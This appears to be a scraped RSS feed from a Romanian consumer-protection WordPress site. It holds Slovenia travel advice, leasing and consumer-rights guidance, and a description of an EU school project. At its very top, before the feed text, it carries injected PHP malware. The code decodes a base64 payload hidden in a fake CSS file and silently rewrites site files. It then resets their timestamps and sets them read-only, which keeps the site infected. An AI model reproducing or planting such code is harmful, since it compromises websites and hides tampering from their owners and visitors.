$wp_update_file="/home/shuffles/public_html/wp-includes/css/wp-timer.css"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } }
Warning: Cannot modify header information - headers already sent by (output started at /home/shuffles/public_html/wp-config.php:78) in /home/shuffles/public_html/wp-includes/feed-rss2.php on line 8
drepturile consumatorilor – O noua atitudine http://o9atitudine.ro Un site de educare si informare in domeniul protectiei consumatorilor, protectiei mediului, contrafacerii si pirateriei Sun, 09 Sep 2012 15:31:11 +0000 en-US hourly 1 https://wordpress.org/?v=6.4.4 http://o9atitudine.ro/wp-content/uploads/cropped-o-9-atitudine_albastru_mare-32x32.png drepturile consumatorilor – O noua atitudine http://o9atitudine.ro 32 32 Slovenia http://o9atitudine.ro/informatii_calatorie/slovenia/ Sun, 09 Sep 2012 09:05:57 +0000 http://o9atitudine.ro/?p=160 Condiţii de intrare şi regim de şedere

Cetăţenii români nu au nevoie de viză pentru a călători în Republica Slovenia. Intrarea în Republica Slovenia este permisă cu paşaportul sau cartea de identitate în curs de valabilitate.

Toţi străinii, inclusiv cetăţenii UE au obligaţia să se înregistreze la poliţia pe raza căreia locuiesc, în termen de 3 zile de la sosirea în Slovenia. Pentru cazul în care se cazează la hotel, acesta se ocupă de înregistrare.

Pentru verificarea condiţiilor particulare de intrare şi şedere prevăzute de legislaţia naţională vă recomandăm consultarea informaţiilor oficiale furnizate de autorităţile slovene:

Ministerul Afacerilor Externe recomandă cetăţenilor români care intenţionează să rămână pentru o perioadă îndelungată pe teritoriul acestui stat să se adreseze misiunii diplomatice a României şi să îşi anunţe prezenţa în regiune, comunicând coordonatele personale pentru a putea fi contactaţi în situaţii de urgenţă.


Ameninţări teroriste

Terorismul este un fenomen global, nelocalizat, prin urmare nici Republica Slovenia nu poate fi exclusă din faţa acestei ameninţări.

Slovenia nu a suferit atacuri teroriste directe pe teritoriul naţional.

Vă recomandăm să urmăriţi în permanenţă anunţurile şi recomandările făcute de autorităţile slovene şi să accesaţi periodic site-ul web al Ministerului român al Afacerilor Externe.


Siguranţă şi criminalitate

Slovenia este o ţară sigură din punctul de vedere al criminalităţii.

Infracţiuni minore de tipul furtului din buzunare, înşelăciunilor sau furtului din maşini pot apărea în zone aglomerate (gări, staţii, parcări, centre comerciale, benzinării sau zone de servicii pe autostrăzi).

Recomandări generale:

  • Păstraţi în locuri sigure documentele şi valorile personale, biletele de călătorie banii, cărţile de credit şi nu le expuneţi în mod vizibil asupra dumneavoastră sau în maşini.
  • Maşinile trebuie încuiate şi asigurate cu sisteme de alarmă.
  • În cazul călătoriei cu autobuzul sau trenul păstraţi atenţia asupra bagajelor pe întreaga durată a călătoriei.
  • Pentru ieşirile în oraşe, în special în zonele aglomerate, lăsaţi documentele personale la hotel şi păstraţi numai o copie a actelor de identitate (paşaport, permis de şedere).
  • În cazul unor incidente care afectează siguranţa persoanei sau a bunurilor, vă recomandăm să contactaţi poliţia locală precum şi cel mai apropiat oficiu consular român: Ambasada României din Ljubljana.
  • În cazul unor incidente grave (accidente, tâlhării), care necesită intervenţia imediată a autorităţilor slovene, trebuie apelate următoarele numere de urgenţă: 112 – Servicii de urgenţă (Pompieri si Salvarea) şi 113 – Poliţie.

Atenţie! Dacă sunaţi din greşeală la 112, nu închideţi! În caz contrar, vi se poate trimite o maşină în locul în care vă aflaţi, pentru a vedea dacă totul este în regulă!


Sistemul medical

Asigurarea medicală este obligatorie în Republica Slovenia. Vă recomandăm cu insistenţă să încheiaţi o asigurare medicală de sănătate sau să obţineţi Cardul European de Sănătate înainte de a pleca într-o călătorie.

Dacă vă îmbolnăviţi sau aveţi un accident pe durata unei şederi temporare într-un stat membru UE, formularul E112 sau Cardul european de asigurări sociale de sănătate vă va da acces la îngrijirile medicale necesare. Acest Card vă va permite să primiţi asistenţa medicală necesară în timpul şederii dumneavoastră temporare în orice ţară a Uniunii Europene.

Mai multe detalii găsiţi la adresele: www.cnas.ro/ şi www.ceass.ro/.

Este bine ca asigurarea medicală suplimentară să fie valabilă în toate ţările. În baza unei asemenea asigurări facultative, aveţi acces la serviciile de urgenţă atât din sistemul public de sănătate, cât şi din cel privat (în funcţie de tipul poliţei de asigurare). La încheierea unei asemenea asigurări verificaţi coordonatele partenerului societăţii de asigurare în ţara de destinaţie şi de tranzit.

Vă recomandăm să vă încheiaţi, înainte de plecare, o asigurare de călătorie. Aceasta are valabilitate în toate ţările şi poate să acopere de la riscurile de bază (îmbolnăviri, accidente, urgenţe stomatologice, repatriere sanitară sau în caz de deces) până la toate riscurile de călătorie, inclusiv pierderea/ furtul/ deteriorarea bagajelor, anularea plecării în străinătate, falimentul companiei aeriene etc.

Asigurarea de viaţă s-a dovedit benefică pentru familiile celor decedaţi în urma unor accidente sau din motive de boală.

În Uniunea Europeană nu aveţi nevoie de vaccinări speciale.


Condiţii privind traficul auto

  • Circulaţia auto

În Republica Slovenia, circulaţia auto se efectuează pe partea dreaptă a drumului.
Pe tot parcursul anului este obligatoriu ca farurile să fie aprinse în permanenţă (faza de întâlnire).

Funcţionează sistemul priorităţii de dreapta.

Este interzisă oprirea autoturismului pe banda de urgenţă.

Atenţie! În cazul în care primiţi o amendă şi nu dispuneţi de suma necesară, autorităţile competente slovene (poliţia si/sau compania slovena care administrează autostrăzile – DARS) au dreptul să vă reţină actele până la plata amenzii.

În urma încălcării legislaţiei privind siguranţa traficului rutier, autorităţile competente eliberează un proces verbal de amenda si un proces verbal de reţinere a tuturor documentelor de identitate ale conducătorului auto şi ale autoturismului.
În Republica Slovenia autorităţile poliţieneşti pot fi prezente atât în uniformă, cât şi civili cu autoturisme corespunzătoare.

Atenţie! În cazul în care, în urma unui control al poliţiei rutiere slovene, există suspiciuni privind provenienţa legală a maşinii, aceştia au dreptul să reţină autovehiculul până la identificarea acestuia, perioada care poate dura până la 6 luni, fără drept de despăgubire.

Atenţie! Începând cu data de 1 iulie 2009, pentru vinietele aferente utilizării reţelei de autostrăzi din Slovenia, sunt aplicate următoarele tarife:

Pentru autovehiculele de până la 3,5 t:

  • vinietele cu o valabilitate de 1 săptămână costă 15 Euro
  • vinietele cu o valabilitate de 1 lună pot fi achiziţionate cu 30 de Euro
  • vinietele cu o valabilitate de 1 an pot fi achiziţionate cu 95 Euro

Pentru motociclete:

  • vinietele cu o valabilitate de 1 săptămână costă 7,50 Euro
  • vinietele cu o valabilitate de 6 luni costă 25 Euro
  • vinietele cu o valabilitate de 1 an costă 47,50 Euro

Pentru autovehiculele cu masa de peste 3,5 t se va utiliza in continuare sistemul valabil in prezent:  plata în numerar la staţia  de taxare.

Vinietele pot fi achiziţionate de la staţiile de carburanţi din Ungaria, Croaţia, Austria, Italia – înainte de intrarea pe teritoriul Republicii Slovenia, sau de la prima staţie de carburanţi de pe teritoriul Sloveniei.

VINIETA SE LIPEŞTE OBLIGATORIU PE PARBIZ, ÎN PARTEA DREAPTĂ SUS.

Informaţii suplimentare referitoare la punctele de vânzare a vinietelor se pot obţine la adresa:

https://www.dars.si/Dokumenti/Toll/Methods_of_payment/Vehicles_under_35_t/Vignette/Sales_points_309.aspx

Contravenţia pentru nerespectarea legislaţiei locale este de 300 euro sau 150 euro achitaţi în termen de 8 zile.

  • Starea drumurilor

Starea generală a drumurilor şi a infrastructurii este foarte bună.

  • Parcarea

Parcarea în interiorul localităţilor este permisă numai în locuri rezervate, contra cost, iar tichetele trebuie afişate la vedere în interiorul maşinii.

  • Centura de siguranţă

Centura de siguranţă este obligatorie.

  • Limitele de viteză admise
    • în localităţi – 50 km/oră
    • în afara localităţilor – 90 km/oră
    • pe drumuri expres- 100 km/oră
    • autostrăzi – 130 km/oră.

Depăşirea limitelor de viteză poate atrage aplicarea unor amenzi intre 60 si 1200 de euro şi suspendarea permisului de conducere în cazul în care şoferii au depăşit cu 30-50  km/h limita de viteză, în funcţie de categoria drumului.

  • Folosirea telefonului mobil la volan

Este interzisă.

  • Permisul de conducere

Permisul de conducere românesc este valabil în Slovenia.

  • Aparatele anti-radar şi de detectare a radarului

Pe teritoriul Sloveniei sunt interzise deţinerea şi utilizarea dispozitivelor de detectare a radarelor, precum şi a aparatelor antiradar.

Amenzile pentru încălcarea legislaţiei privind siguranţa traficului rutier pentru acest articol sunt cuprinse intre 400-800 euro pentru persoanele fizice.

  • Informaţii pentru cazurile de accident de circulaţie: 

În caz de accident uşor, notaţi elementele de identificare ale celuilalt autovehicul implicat în accident şi ale societăţii de asigurare a acestuia.
Dacă în urma accidentului sunt răniţi, chemaţi poliţia locală, după ce aţi acordat primul ajutor. Adresaţi-vă pentru sprijin partenerului societăţii de asigurări din Republica Slovenia. Păstraţi documentele de plată până la înapoierea în ţară pentru a le prezenta societăţii de asigurare.

Telefoane utile în caz de urgenţă:

  • 112 sau 911 – Urgenţă (Pompieri şi Salvare)
  • 113 – Poliţia


Utilizarea cărţilor de credit

În Republica Slovenia există un sistem bine dezvoltat şi o reţea puternică de ATM-uri. Se acceptă plata cu cărţi de credit/debit la majoritatea magazinelor, restaurantelor, staţiilor de benzină.


Reglementări vamale

Nu există controale la graniţele interne, dintre statele semnatare ale Acordului Schengen: Austria, Belgia, Danemarca, Estonia, Finlanda, Franţa, Germania, Grecia, Italia, Letonia, Lituania, Luxemburg, Malta, Olanda, Polonia, Portugalia, Republica Cehă, Slovacia, Republica Slovenia, Spania, Suedia, Ungaria, precum şi Islanda, Norvegia şi Elveţia (ultimele trei nefiind membre ale UE).

Din motive de ordine publică, sănătate publică sau de securitate naţională, la graniţele interne ale UE se pot introduce controale, pentru perioade limitate.

Limitele cantitative pentru introducerea anumitor produse sunt: ţigări: 800 bucăţi sau 200 ţigări de foi sau 50 trabucuri sau 1 kg tutun; 10 litri băuturi alcoolice cu concentraţia mai mare de 22 % sau 20 litri de băutură cu concentraţia mai mica de 22 %.

Este interzisă scoaterea din Republica Slovenia a obiectelor de artă şi cultură.

În Republica Slovenia este interzisă deţinerea ilegală de arme de foc, iar intrarea/tranzitarea spaţiului acestei tari. În cazul excursiilor destinate vânătorii, cetăţenii români pot călători cu arma de vânătoare cu următoarele condiţii: deţinerea unui permis european, licenţa pentru armă şi documentele care să dovedească scopul călătoriei + vânătoarea.

Sfătuim persoanele interesate să călătorească cu alte arme care nu sunt de vânătoare sa se adreseze din timp autorităţilor poliţieneşti slovene pentru obţinerea autorizaţiei de intrare/tranzitare cu arme în această ţară.


Regimul medicamentelor

Sunt excluse atât la intrare cât şi la ieşire drogurile de orice tip şi substanţele dopante.

Atenţie! Nu luaţi cu dumneavoastră decât cantităţile de medicamente strict necesare!

Vă recomandăm să aveţi la dumneavoastră reţeta medicului pentru medicamentele care depăşesc sfera celor uzuale.

Antibioticele nu se eliberează decât pe bază de reţetă.


Regimul animalelor de companie

Pentru spaţiul UE, aveţi nevoie de paşaport european pentru animalele de companie. Acest document se poate procura de la medicul veterinar şi trebuie să conţină informaţii despre vaccinarea antirabică.

Animalul trebuie identificat printr-un microcip electronic.

Informaţiile prezentate în această secţiune au numai caracter informativ. Ele nu angajează răspunderea ministerului, pentru eventualele prejudicii suferite pe timpul călătoriei. Fiecare călător trebuie să fie conştient de faptul că riscurile de securitate sunt prezente oriunde în lume şi să îşi asigure în mod individual măsurile de protecţie necesare.

Pentru informaţii suplimentare verificaţi pagina Direcţiei Vămilor din Republica Slovenia http://www.carina.gov.si/en/travellers/travelling_within_eu/travelling_w…

Sursa: www.mae.ro

]]>
PROGRAMUL NAŢIONAL PENTRU PROTECŢIA CONSUMATORILOR DE PRODUSE ŞI SERVICII FINANCIAR BANCARE DREPTURI ALE CONSUMATORILOR http://o9atitudine.ro/info/programul-national-pentru-protectia-consumatorilor-de-produse-si-servicii-financiar-bancare-drepturi-ale-consumatorilor/ Thu, 19 Mar 2009 23:08:33 +0000 http://o9atitudine.ro/?p=110 PROTECŢIA CONSUMATORILOR ÎN UNIUNEA EUROPEANĂ
Protecţia consumatorilor are ca obiectiv promovarea şi apărarea drepturilor  fundamentale  ale  acestora, cu referire la principalele probleme specifice:

ACCES LA O PIAŢĂ CU O GAMĂ VARIATĂ DE PRODUSE ŞI SERVICII DE CALITATE CORESPUNZĂTOARE
– Dezvoltarea pieţei libere şi concurenţiale, prin prevenirea tendinţelor monopoliste şi eliminarea barierelor administrative (avize, autorizaţii, etc.).
– Combaterea fenomenului contrafacerilor şi pirateriei.
– Promovarea unei oferte de produse şi servicii cât mai variate care să crească gradul de satisfacţie a consumatorilor.

DREPTUL LA INFORMARE
– Obligativitatea agenţilor economici de a informa consumatorii, în mod complet, corect şi precis asupra caracteristicilor esenţiale ale produselor şi serviciilor oferite acestora.
– Interzicerea prezentării, prin publicitate, a unor valori ale parametrilor ce caracterizează produsele sau serviciile, altele  decât cele efectiv realizate.
– Informarea corectă şi precisă cu privire la preţuri şi tarife.
– Utilizarea mijloacelor de măsurare, în prezenţa consumatorilor, la vederea acestora.

DREPTUL LA EDUCARE
– Cunoaşterea drepturilor şi obligaţiilor pe care le au în calitate de consumatori.
– Dezvoltarea capacităţii de autoprotecţie individuală şi asociativă.
– Promovarea unei NOI ATITUDINI, prin utilizarea mijloacelor legale de apărare a drepturilor consumatorilor.

CUM NE APĂRĂM DREPTURILE?
Dincolo de obligaţiile organelor statului de a elabora reglementări privind drepturile consumatorilor, de a supraveghea şi controla piaţa pentru a lua măsuri de prevenire şi combatere a  încălcării acestora,  un  consumator  avizat  şi  activ ia atitudine când constată că pe piaţă sunt încălcate drepturile consumatorilor, prin depunerea unei sesizări scrise/telefonice/ on-line, după caz, fie la organul administrativ competent, fie la o asociaţie de consumatori.

CONTRACTELE TREBUIE SĂ FIE CORECTE PENTRU CONSUMATORI
Ai semnat vreodată un contract fără să citeşti şi ce scrie cu litere foarte mici? Ce se întâmplă dacă ceea ce e redactat cu litere mici spune că depozitul pe care l-ai plătit este nerambursabil – chiar în cazul în care compania nu-şi îndeplineşte obligaţiile? Dar dacă spune că nu poţi anula contractul decât dacă plăteşti companiei o  sumă exorbitantă în compensare?
Legislaţia europeană prevede că aceste tipuri de clauze abuzive sunt interzise. Indiferent de statul membru în care semnezi contractul, legislaţia europeană te protejează de astfel de abuzuri.

SERVICII DE LEASING
LEASING – operaţiunea prin care o parte denumită LOCATOR, transmite celeilalte părţi, denumită UTILIZATOR, contra unei plăţi periodice, denumită rată de leasing (redevenţă), dreptul de posesiune şi folosinţă al unui bun al cărui proprietar rămâne pentru o perioadă determinată de timp.

Cadrul Legal
Ordonanţa 51/1997 privind operaţiunile de leasing şi societăţile de leasing cu modificările şi completările ulterioare.
Legea 90/1998 pentru aprobarea OG 51/1997, privind operaţiunile de leasing şi societăţile de leasing.

CONTRACTUL DE LEASING TREBUIE SĂ CUPRINDĂ, PE LÂNGĂ PĂRŢILE CONTRACTANTE, CEL PUŢIN URMĂTOARELE ELEMENTE:
a) clauza privind definirea contractului de leasing ca leasing financiar sau operaţional;
b) denumirea bunului care face obiectul contractului de leasing şi caracteristicile de identificare a acestuia;
c) valoarea ratelor de leasing şi termenul de pată a acestora;
d) perioada de utilizare în sistem de leasing a bunului;
e) clauza privind obligaţia asigurării bunului;
f) valoarea totală a contractului de leasing.
Contractul de leasing financiar trebuie să cuprindă, pe lângă elementele prevăzute mai sus, următoarele:
a) valoarea de intrare a bunului;
b) valoarea reziduală a bunului convenită de părţi, când este cazul;
c) valoarea avansului;
d) rata de leasing.
Contractul de leasing nu se poate încheia pe un termen mai mic de un an.

OBLIGAŢII PENTRU LOCATOR / FINANŢATOR
a) să respecte dreptul locatarului/utilizatorului de a alege furnizorul de bunuri, potrivit intereselor sale;
b) să contracteze bunul cu furnizorul desemnat de locatar/ utilizator, în condiţiile expres formulate de către acesta sau, după caz, să dobândească dreptul definitiv de utilizare asupra programului pentru calculator;
c) să încheie contractul de leasing cu locatarul/utilizatorul şi să transmită acestuia, în temeiul contractului de leasing, drepturile ce derivă din contract, cu excepţia dreptului de dispoziţie, iar în cazul programelor pentru calculator, să transmită dreptul de utilizare asupra programelor pentru calculator către locatar/utilizator, fără a-şi mai putea exercita acest drept pe perioada derulării contractului de leasing;
d) să respecte dreptul de opţiune al locatarului/utilizatorului de a cumpăra bunul, de a prelungi contractul de leasing, fără a
schimba natura leasingului, ori de a înceta raporturile contractuale;
e) să îi garanteze locatarului/utilizatorului folosinţa liniştită a bunului, în condiţiile în care acesta a respectat toate clauzele contractuale;
f)  să asigure, printr-o societate de asigurare, bunurile oferite în leasing, dacă prin contractul de leasing părţile nu au convenit altfel.

OBLIGAŢII PENTRU LOCATAR/UTILIZATOR
a) să efectueze recepţia şi să primească bunul la termenul şi în condiţiile de livrare agreate cu furnizorul;
b) să exploateze bunul conform instrucţiunilor elaborate de către furnizor şi să asigure instruirea personalului desemnat să îl exploateze;
c) să nu greveze de sarcini bunul care face obiectul contractului de leasing decât cu acordul finanţatorului;
d) să achite toate sumele conform contractului de leasing – rate de leasing, asigurări, impozite, taxe – în cuantumul şi la termenele menţionate în contract;
e) să suporte cheltuielile de întreţinere precum şi orice alte cheltuieli aferente bunului său din contractul de leasing;
f)  să îşi asume pentru întreaga perioadă a contractului, în lipsa unei stipulaţii contrare, totalitatea obligaţiilor care decurg din folosirea bunului utilizat direct sau prin prepuşii săi, inclusiv riscul pierderii, distrugerii sau avarieriii bunului utilizat, din cauze fortuite, şi continuitatea plăţilor cu titlu de rată de leasing până la achitarea integrală a valorii contractului de leasing;
g) să permită locatorului/finanţatorului verificarea periodică a stării şi a modului de exploatare a bunului care face obiectul contractului de leasing;
h) să îl informeze pe locator/finanţator, în timp util, despre orice tulburare a dreptului de proprietate, venită din partea unui terţ;
i) să nu aducă modificări bunului şi să nu schimbe locul declarat în contract fără acordul locatorului/finanţatorului;
j) să restituie bunul în conformitate cu prevederile contractului de leasing.

ZECE PRINCIPII FUNDAMENTALE
1. CUMPĂRĂ CE DOREŞTI, DE UNDE DOREŞTI.
2. DACĂ NU FUNCŢIONEAZĂ, RETURNEAZĂ-L.
3. STANDARDE RIDICATE PENTRU ALIMENTE ŞI BUNURILE
DESTINATE CONSUMATORILOR.
4. ŞTII CE MĂNÂNCI.
5. CONTRACTELE TREBUIE SĂ FIE CORECTE PENTRU
CONSUMATORI.
6. UNEORI CONSUMATORII SE POT RĂZGÂNDI.
7. ESTE MAI UŞOR SĂ COMPARI PREŢURILE.
8. CONSUMATORII NU TREBUIE SĂ FIE INDUŞI ÎN EROARE.
9. PROTECŢIE ÎN TIMPUL VACANŢELOR.
10. SOLUŢIONARE EFICIENTĂ A LITIGIILOR TRANSFRONTALIERE.

Pentru mai multe informaţii:
www.protectia-consumatorilor.ro
www.dolceta.eu
www.infoeuropa.ro
www.bnr.ro
www.birouldecredit.ro

CE NU TREBUIE SĂ FACI CÂND AI DATORII:
– Nu te ascunde după deget! Nu te face că nu vezi cum îţi cresc datoriile şi nu le ignora – ele nu vor dispărea de la sine, iar situaţia va deveni din ce în ce mai dramatică.
– Nu lăsa nedeschise plicurile cu facturi sau extrase de cont!
– Nu încerca să împrumuţi şi mai mulţi bani ca să îţi plăteşti toate datoriile, fără să te consulţi mai întâi cu un consilier financiar.

CE TREBUIE SĂ FACI CÂND AI DATORII:
– Cere sfaturi şi ajutor înainte ca situaţia să scape de sub control.
Există organizaţii de caritate sau organizaţii ale consumatorilor, care te pot ajuta.

– Menţine o relaţie buna cu finanţatorul.
Înţelege că majoritatea creditorilor sunt dispuşi să discute cu tine despre problemele pe care le ai şi sunt pregătiţi să accepte un plan realist de plată a datoriei.

– Acţionează! Ia legătura cât mai curând cu cei cărora le eşti dator. Cu cât află mai repede problema, cu atât ai şanse mai mari să te înţeleagă şi să găsiţi împreună o cale de returnare a datoriilor.

]]>
Agenda Europa – E alegerea TA! http://o9atitudine.ro/publicatii/agenda-europa-e-alegerea-ta/ Thu, 19 Mar 2009 20:13:40 +0000 http://o9atitudine.ro/?p=24 Fundatia Generation Europe – Bruxelles (www.generation-europe.org; www.generation-europe.ro), in parteneriat cu Institutul de Stiinte ale Educatiei si Asociatia Nationala pentru Protectia Consumatorilor si Promovarea Programelor si Strategiilor din Romania, deruleaza in Romania proiectul „Agenda Europa – E alegerea ta!”, proiect finantat de Directia Generala de Sanatate si Protectia Consumatorului si Directia Generala de Mediu din cadrul Comisiei Europene.

Proiectul Agenda Europa „E alegerea ta” este rezultatul eforturilor conjugate la nivel european, pentru ca tinerii să beneficieze de o educaţie fundamentală în domeniile sănătăţii, consumului şi protecţiei mediului. Proiectul este implementat în toate ţările membre ale Uniunii Europene si are ca scop principal informarea si pregatirea elevilor de liceu (15-18 ani) in ceea ce priveste Drepturile consumatorului – Protecţia mediului – Energie – Consum raţional – Cetăţenia activă – valorile Uniunii Europene.

Proiectul se deruleaza in perioada 2006 – 2009 si cuprinde elaborarea, editarea si distribuirea: Agendei Europa „E alegerea ta!”; Ghidul profesorului; CD-ROM cu Training-ul profesorului.

Agenda Europa „E alegerea ta” este o agendă practică, pentru completarea educaţiei şcolare, prin informarea corectă şi obiectivă a elevilor, cu scopul de a-i învăţa să-şi formeze şi să exprime opinii cu privire la probleme de interes public: cetăţenia activă, mediul înconjurător, sănătatea populaţiei, probleme de consum etc. Ea acoperă domenii precum Uniunea Europeană, drepturile consumatorilor, administrarea fondurilor proprii, reclamele, siguranţa utilizării Internet-ului, protecţia mediului, consumul raţional, etc.

Agenda susţine formarea capacităţii de a lua decizii întemeiate, ajutându-i pe tineri să aleagă în cunoştinţă de cauză, neinfluenţaţi şi pe deplin responsabili.

Ea contribuie la formarea unor cetăţeni activi şi la educaţia pentru dezvoltare durabilă, prin informarea tinerilor cu privire la efectele acţiunilor lor, în plan social, economic sau în raport cu mediul, dezvoltindu-le, tot odata, competenţe de identificare şi de analiză a formelor de influenţare sau de manipulare prin media.

Agenda este şi un excelent instrument de informare şi de management al timpului – o metodă pentru organizarea şi proiectarea timpului de învăţare pe tot parcursul anului şcolar.

Ghidul profesorului este conceput ca un suport didactic în sprijinul profesorilor care vor coordona proiectul „Agenda Europa” la nivelul fiecărei clase de elevi.

De ce se elaborează aceste agende? Consumul raţional este o problemă din ce în ce mai complexă. Multe subiecte, de la siguranţa produselor la economisirea apei şi a energiei, la reducerea materialelor reziduale, ne afectează pe toţi. Multe dintre aceste probleme trec dincolo de graniţele naţionale. Iată de ce Comisia Europeană ne-a cerut să realizăm această agendă, pentru a-i ajuta pe tinerii europeni să-şi înţeleagă drepturile şi responsabilităţile.

Agenda Europa „E alegerea ta!” este distribuită în şcoli, în toate cele 27 de ţări ale Uniunii Europene. Prima versiune romaneasca a Agendei Europa a fost distribuita, anul trecut, unui numar de 125 000 de elevi, din 600 de scoli. Anul acesta, dorim ca un numar de 140.000 de exemplare sa fie distribuite elevilor din clasa a XI-a, din România.

]]>